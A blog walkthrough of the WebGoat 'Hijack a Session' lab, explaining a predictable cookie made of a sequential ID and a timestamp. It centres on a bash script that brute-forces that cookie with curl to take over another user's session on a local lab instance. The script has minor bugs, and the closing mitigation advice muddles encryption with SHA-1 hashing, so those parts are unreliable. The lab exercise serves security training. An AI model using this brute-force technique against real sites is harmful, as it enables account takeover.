Webgoat - Hijack a Session

Webgoat – Hijack a Session

In this walk through, we will be going through the Hijack a Session vulnerability section from Webgoat Labs. We will be exploring and exploiting Session Hijacking in various applications and learn how application are affected because of it. So, let’s get started with the Hacking without any delay.

Hijack a Session

Hijack a session

  • In this challenge, we have to gain access to an authenticated session belonging to someone else by predicting the hijack_cookie value.

Hijack a session

Login panel

  • I looked into the cookie in the storage section of our dev tools and try to decode it in my own way.

Stored cookies

  • The cookie value has 2 parts. The second one is the Unix Timestamp of UTC time when the cookie was created.

Cyberchef  UNIX timestamp

Account Access

  • Ideally we can bruteforce the cookie value then by incrementing the time value in the second part.

Burpsuite POST request

Burpsuite Response

  • I used the below script for the cookie value bruteforcing.

# !/bin/bash  
  
username=test  
password=test  
JSESSIONID="ek-lLMw7nb30j0quuVYTRvvtMAICq4w-yZwJfuuz"  
  
sessionFoundId=0  
sessionFoundStartTime=0  
sessionFoundEndTime=0  
currentSessionId=0  
previousSessionId=0  
currentSessionTimestamp=0  
previousSessionTimestamp=0  
  
echo "================= Searching for session =================================="  
echo  
  
for request in $(seq 1 1000); do  
  
currentSession="$(curl -i -v -X POST "http://localhost/WebGoat/HijackSession/login/?username=$username&password=$password" -H "Cookie: JSESSIONID=$JSESSIONID;" 2>&1 | grep hijack_cookie | grep -v "< Set-Cookie:" | cut -d'=' -f2 | cut -d';' -f1)"  
currentSessionId="$(echo $currentSession | cut -d'-' -f1)"  
currentSessionTimestamp="$(echo $currentSession | cut -d'-' -f2)"  
  
echo $currSessId - $currTS  
  
if ! [ -z $previousSessionId ]  
then  
    if [ $((currentSessionId - previousSessionId)) -eq 2 ]  
    then  
        echo  
        echo "Session found: $previousSessionId - $currentSessionId"  
        echo  
        sessionFoundId=$((previousSessionId+1))  
        sessionFoundStartTime=$previousSessionTimestamp  
        sessionFoundEndTime=$currentSessionTimestamp  
        break  
    fi  
fi  
  
previousSessionId=$currentSessionId  
previousSessionTimestamp=$currentSessionTimestamp  
  
done  
  
echo  
echo "================= Session Found: $sessionFoundId ================="  
echo  
echo "| From timestamps $sessionFoundStartTime to $sessionFoundEndTime |"  
echo  
echo "================= Starting session for $sessionFoundId at $sessionFoundStartTime ================="  
echo  
  
for timestamp in $(seq -f %1.0f $sessionFoundStartTime $sessionFoundEndTime); do  
   
    response=$(curl -v -X POST "http://localhost/WebGoat/HijackSession/login/?username=$username&password=$password" -H "Cookie: JSESSIONID=$JSESSIONID; hijack_cookie=$sessionFoundId-$timestamp;secure;" 2>&1 | grep feedback | cut -d':' -f2)  
    echo $sessionFoundId-$timestamp: $response  
  
done

hijack_cookie.sh

Burpsuite Intercept

Account Access

Also Read: Webgoat – Cross-Site Request Forgeries

Conclusion:

Conclusion

So, we finally completed the Webgoat Hijack a Session Vulnerability section. Next, we can mitigate these types of attacks by using a random session generation algorithm and encrypting it with a secure hashing algorithm like SHA-1 and SHA-256. Along with some cookie attributes set to HttpOnly Flag and Secure Flag. On that note, i will take your leave and will meet you in next one with another Webgoat vulnerability writeup, till then “Keep Hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top